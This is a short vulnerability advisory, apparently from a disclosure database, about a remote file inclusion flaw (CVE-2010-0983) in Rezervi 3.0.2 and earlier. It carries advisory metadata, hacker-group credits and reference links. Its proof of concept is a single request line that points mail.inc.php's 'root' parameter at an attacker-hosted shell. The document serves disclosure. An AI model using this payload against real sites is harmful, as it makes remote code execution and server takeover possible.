Topic : | Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablitie
|
SecurityAlert : 7141
CVE : CVE-2010-0983
CWE : CWE-94
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : r00t.h4x0r
Published : 20.03.2010
Affected Software : | utilo:rezervi:3.0.2 and previous versions |
 Advisory Content : ###############################################################
## Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablities ##
## http://www.rezervi.com ##
###############################################################
###############################################################
Discovered : r00t.h4x0r <r00t.h4x0r[!]hotmail.com>
Homepage : !n y0ur m!nd
###############################################################
PoC r00t :
[r00t.h4x0r]/include/mail.inc.php?root=[Shell]
###############################################################
9r33tz : cr4wl3r
###############################################################
#################### [ INDONESIAN HACKER ] ####################
References :
http://xforce.iss.net/xforce/xfdb/55341
http://www.vupen.com/english/advisories/2010/0016
http://www.securityfocus.com/bid/37589
http://www.exploit-db.com/exploits/10967
http://secunia.com/advisories/38118
http://packetstormsecurity.org/1001-exploits/rezervi-rfi.txt
http://osvdb.org/61450
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|